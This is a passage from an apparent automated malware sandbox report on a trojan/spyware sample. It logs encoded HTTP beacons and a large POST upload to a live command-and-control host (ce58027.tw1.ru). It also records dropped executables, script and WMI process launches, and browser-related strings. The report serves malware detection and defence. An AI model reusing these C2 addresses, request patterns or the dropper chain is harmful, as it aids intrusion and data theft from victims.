9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpFkeNVTQU1kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiETZiNDM3kzMxEjZlFzM2IWY1MTY0gzMwU2MwADZ2cTYiwiIihDM5cTMmVmZ2I2YlNDN3EWZyETN1cjMjFjY1kzN3YTZ3ADNxcTZzIiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: ce58027.tw1.ru
Source: global traffic	HTTP traffic detected: GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&dad8ed6f5561ed0ffbb71c569304256f=d1nIwEmYmNmM1QjYxIjNkhzNyEWYhJDZhN2YhZWOhVjN2QGN0UDZwQWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W&1b4307a464f9201736c9c444186ee18b=QX9JiI6ISMlJ2MwcTOzETMmVWMzYjYhVzMhRDOzATZzADMkZzNhJCLiATYiZ2YyUDNiFjM2QGO3ITYhFmMkF2YjFmZ5EWN2YDZ0QTNkBDZlVjI6ICNkZjMzMGO2UjZkF2N1cjZjRmZ4M2MwYmN5IGO2MGM4ICLiMjNxAzMkVDNiZmZzYzN4YTMkVWNlNTNlRmNxUjMwEGZzcDZzkjYlNjI6ICNkJ2YklTMwIjMwIjNkhzMkZDMhZWZzMGMkhjN2QGZmJyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpNWbiBnQYpFb4JTVp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUaJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpFkeNVTQU1kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiETZiNDM3kzMxEjZlFzM2IWY1MTY0gzMwU2MwADZ2cTYiwiIihDM5cTMmVmZ2I2YlNDN3EWZyETN1cjMjFjY1kzN3YTZ3ADNxcTZzIiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: ce58027.tw1.ruConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: ce58027.tw1.ru

Source: unknown

HTTP traffic detected: POST /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN HTTP/1.1Content-Type: multipart/form-data; boundary=----------WebKitFormBoundary1w3KrLv8X3hkVvoaUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: ce58027.tw1.ruContent-Length: 83176Expect: 100-continueConnection: Keep-Alive

Source: aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2908319735.00000000032E6000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2908319735.00000000032AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ce58027.tw1.ru
Source: aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2908319735.0000000003091000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ce58027.tw1.ru/
Source: aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2908319735.00000000032E6000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2908319735.00000000032AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ce58027.tw1.ru/4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMl
Source: aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2908319735.0000000003091000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ce58027.tw1.ru/4fe1d043.php?sfxSMm=rxb3wPgb0HPV&2e6ea3aaeac867bc064a534e31e365d4=6f9cfd298d97
Source: providerwebmonitor.exe, 00000004.00000002.1711103397.000000000266A000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2908319735.0000000003091000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.0000000013119000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.000000001329F000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.00000000131CF000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.0000000013337000.00000004.00000800.00020000.00000000.sdmp, pKcy9gRiRF.20.dr, foJjr7Samq.20.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.0000000013119000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.000000001329F000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.00000000131CF000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.0000000013337000.00000004.00000800.00020000.00000000.sdmp, pKcy9gRiRF.20.dr, foJjr7Samq.20.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.0000000013119000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.000000001329F000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.00000000131CF000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.0000000013337000.00000004.00000800.00020000.00000000.sdmp, pKcy9gRiRF.20.dr, foJjr7Samq.20.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.0000000013119000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.000000001329F000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.00000000131CF000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.0000000013337000.00000004.00000800.00020000.00000000.sdmp, pKcy9gRiRF.20.dr, foJjr7Samq.20.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.0000000013119000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.000000001329F000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.00000000131CF000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.0000000013337000.00000004.00000800.00020000.00000000.sdmp, pKcy9gRiRF.20.dr, foJjr7Samq.20.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.0000000013119000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.000000001329F000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.00000000131CF000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.0000000013337000.00000004.00000800.00020000.00000000.sdmp, pKcy9gRiRF.20.dr, foJjr7Samq.20.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.0000000013119000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.000000001329F000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.00000000131CF000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.0000000013337000.00000004.00000800.00020000.00000000.sdmp, pKcy9gRiRF.20.dr, foJjr7Samq.20.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.0000000013119000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.000000001329F000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.00000000131CF000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.0000000013337000.00000004.00000800.00020000.00000000.sdmp, pKcy9gRiRF.20.dr, foJjr7Samq.20.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.0000000013119000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.000000001329F000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.00000000131CF000.00000004.00000800.00020000.00000000.sdmp, aVgRtcWKvuiHvUKTYwWvDjIq.exe, 00000014.00000002.2915256643.0000000013337000.00000004.00000800.00020000.00000000.sdmp, pKcy9gRiRF.20.dr, foJjr7Samq.20.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe	COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}

Source: C:\Users\user\Desktop\hK8z1AmKO1.exe

Code function: 0_2_00B7718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_00B7718C

Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Code function: 0_2_00B7857B	0_2_00B7857B
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Code function: 0_2_00B870BF	0_2_00B870BF
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Code function: 0_2_00B9D00E	0_2_00B9D00E
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Code function: 0_2_00B7407E	0_2_00B7407E
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Code function: 0_2_00BA1194	0_2_00BA1194
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Code function: 0_2_00B7E2A0	0_2_00B7E2A0
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Code function: 0_2_00B73281	0_2_00B73281
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Code function: 0_2_00B902F6	0_2_00B902F6
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Code function: 0_2_00B86646	0_2_00B86646
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Code function: 0_2_00B727E8	0_2_00B727E8
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Code function: 0_2_00B837C1	0_2_00B837C1
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Code function: 0_2_00B9473A	0_2_00B9473A
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Code function: 0_2_00B9070E	0_2_00B9070E
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Code function: 0_2_00B7E8A0	0_2_00B7E8A0
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Code function: 0_2_00B94969	0_2_00B94969
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Code function: 0_2_00B7F968	0_2_00B7F968
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Code function: 0_2_00B83A3C	0_2_00B83A3C
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Code function: 0_2_00B86A7B	0_2_00B86A7B
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Code function: 0_2_00B9CB60	0_2_00B9CB60
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Code function: 0_2_00B90B43	0_2_00B90B43
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Code function: 0_2_00B85C77	0_2_00B85C77
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Code function: 0_2_00B8FDFA	0_2_00B8FDFA
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Code function: 0_2_00B7ED14	0_2_00B7ED14
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Code function: 0_2_00B83D6D	0_2_00B83D6D
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Code function: 0_2_00B7BE13	0_2_00B7BE13
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Code function: 0_2_00B7DE6C	0_2_00B7DE6C
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Code function: 0_2_00B75F3C	0_2_00B75F3C
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Code function: 0_2_00B90F78	0_2_00B90F78
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Code function: 20_2_00007FFD9BA79995	20_2_00007FFD9BA79995
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Code function: 20_2_00007FFD9BA74E93	20_2_00007FFD9BA74E93
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Code function: 20_2_00007FFD9BA7D680	20_2_00007FFD9BA7D680
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Code function: 20_2_00007FFD9BA80DED	20_2_00007FFD9BA80DED
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Code function: 20_2_00007FFD9BA71491	20_2_00007FFD9BA71491
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Code function: 20_2_00007FFD9B8C5A20	20_2_00007FFD9B8C5A20

Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Code function: String function: 00B8ED00 appears 31 times
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Code function: String function: 00B8E28C appears 35 times
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Code function: String function: 00B8E360 appears 52 times

Source: providerwebmonitor.exe.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: sihost.exe.4.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: aVgRtcWKvuiHvUKTYwWvDjIq.exe.4.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: hK8z1AmKO1.exe, 00000000.00000002.1665700993.0000000000838000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe.mui` vs hK8z1AmKO1.exe
Source: hK8z1AmKO1.exe, 00000000.00000002.1665700993.0000000000838000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe` vs hK8z1AmKO1.exe
Source: hK8z1AmKO1.exe, 00000000.00000003.1662371141.0000000006AD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs hK8z1AmKO1.exe
Source: hK8z1AmKO1.exe, 00000000.00000003.1661456125.00000000061C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs hK8z1AmKO1.exe
Source: hK8z1AmKO1.exe, 00000000.00000003.1665040101.0000000000837000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe.mui` vs hK8z1AmKO1.exe
Source: hK8z1AmKO1.exe, 00000000.00000003.1665040101.0000000000837000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe` vs hK8z1AmKO1.exe
Source: hK8z1AmKO1.exe, 00000000.00000003.1661969648.0000000006ADC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs hK8z1AmKO1.exe
Source: hK8z1AmKO1.exe	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs hK8z1AmKO1.exe

Source: hK8z1AmKO1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, TjaH4wbSGYD88x3vdmX.cs	Cryptographic APIs: 'TransformBlock'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, TjaH4wbSGYD88x3vdmX.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, lZyMQKRJJJUZvejocj8.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, lZyMQKRJJJUZvejocj8.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.hK8z1AmKO1.exe.6213554.0.raw.unpack, TjaH4wbSGYD88x3vdmX.cs	Cryptographic APIs: 'TransformBlock'
Source: 0.3.hK8z1AmKO1.exe.6213554.0.raw.unpack, TjaH4wbSGYD88x3vdmX.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.3.hK8z1AmKO1.exe.6213554.0.raw.unpack, lZyMQKRJJJUZvejocj8.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.hK8z1AmKO1.exe.6213554.0.raw.unpack, lZyMQKRJJJUZvejocj8.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, XAD7ok8Z2nvCRZEC49r.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.3.hK8z1AmKO1.exe.6b29554.1.raw.unpack, XAD7ok8Z2nvCRZEC49r.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.3.hK8z1AmKO1.exe.6213554.0.raw.unpack, XAD7ok8Z2nvCRZEC49r.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.3.hK8z1AmKO1.exe.6213554.0.raw.unpack, XAD7ok8Z2nvCRZEC49r.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@36/33@1/1

Source: C:\Users\user\Desktop\hK8z1AmKO1.exe

Code function: 0_2_00B76EC9 GetLastError,FormatMessageW,

0_2_00B76EC9

Source: C:\Users\user\Desktop\hK8z1AmKO1.exe

Code function: 0_2_00B89E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00B89E1C

Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\providerwebmonitor.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3064:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6976:120:WilError_03
Source: C:\Recovery\sihost.exe	Mutant created: NULL
Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\ed44af105f8b3b82bcf6fccdb3896e452a6f1117

Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe

File created: C:\Users\user\AppData\Local\Temp\RHPeWgvtOx

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\PortsavesPerfdhcpsvc\oSG0DtwH58jESdPiWbQWqH7Kb5.bat" "

Source: C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\57b77989-b658-46d2-a5dc-3af9328f5068.vbs"

Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Command line argument: sfxname	0_2_00B8D5D4
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Command line argument: sfxstime	0_2_00B8D5D4
Source: C:\Users\user\Desktop\hK8z1AmKO1.exe	Command line argument: STARTDLG	0_2_00B8D5D4

Source: hK8z1AmKO1.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: hK8z1AmKO1.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
